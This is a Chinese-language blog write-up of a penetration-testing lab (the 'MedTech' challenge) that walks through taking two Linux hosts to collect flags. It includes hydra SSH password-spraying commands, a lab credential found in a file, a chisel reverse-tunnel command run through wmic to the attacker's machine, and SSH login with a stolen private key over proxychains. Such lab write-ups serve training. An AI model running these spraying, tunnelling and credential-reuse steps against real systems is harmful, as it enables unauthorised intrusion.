Challenge 1 - Medtech(5)

 Challenge 1 - Medtech(5)

上一階段完成了 MedTech 這個 LAB 的所有 Windows 主機

剩下兩台 Linux 主機,一台在外網一台在內網

先將目標放在外網這一台 Linux 主機(.120)



這一台之前枚舉過僅有 22,80 Port,80 是一個 PAW 站台且找不到洞進去



現階段將目標放到 22 Port,拿到了不少的帳號密碼,進行密碼噴灑後一樣沒有結果



所以將目標放到已經打下來的 Windows 機器上查找看看有無新發現

在 DC01 伺服器 Administrator 的桌面有發現一個檔案 credentials.txr

內容發現一組帳號密碼 web01: offsec/century62hisan51



這組帳號密碼測試後發現可以登入 .120

└─$ hydra -l offsec -p century62hisan51 ssh://192.168.185.120               



ssh offsec@192.168.185.120 直接進去了,whoami & id 不是管理者也沒有 local.txt



開始 PE,cat /etc/passwd



sudo -l 發現可以執行所有指令,直接 su 後輸入 offsec 密碼變更為 root,拿取 flag



更新攻擊列表,剩下最後一台內網的 Linux 主機



透過 .121 將 kali 的 2222 Port 對應到 172.16.185.14 的 22 Port

wmic process call create "C:\users\joe\desktop\chisel.exe client 192.168.45.188:8080 R:2222:172.16.185.14:22"



開始密碼噴灑測試,└─$ hydra -L ./usernames.txt -P ./passwords.txt ssh://127.0.0.1 -s 2222 -V

沒有發現有用的帳號密碼


之前在外部 Linux 主機 (.122) 有發現一組 mario 的 id_rsa

測試後發現可以直接登入到內網的 .14 Linux 主機

└─$ proxychains4 -q ssh -i id_rsa_mario mario@172.16.185.14                           

進去後 whoami 是 mario 使用者,直接拿取 flag local.txt


雖然目前的 mario 不是 root 但是 LAB 在輸入 local.txt 後 flag 收集滿了

意味著這一台應該是不用 PE 可以直接結束這整個 LAB 了





留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)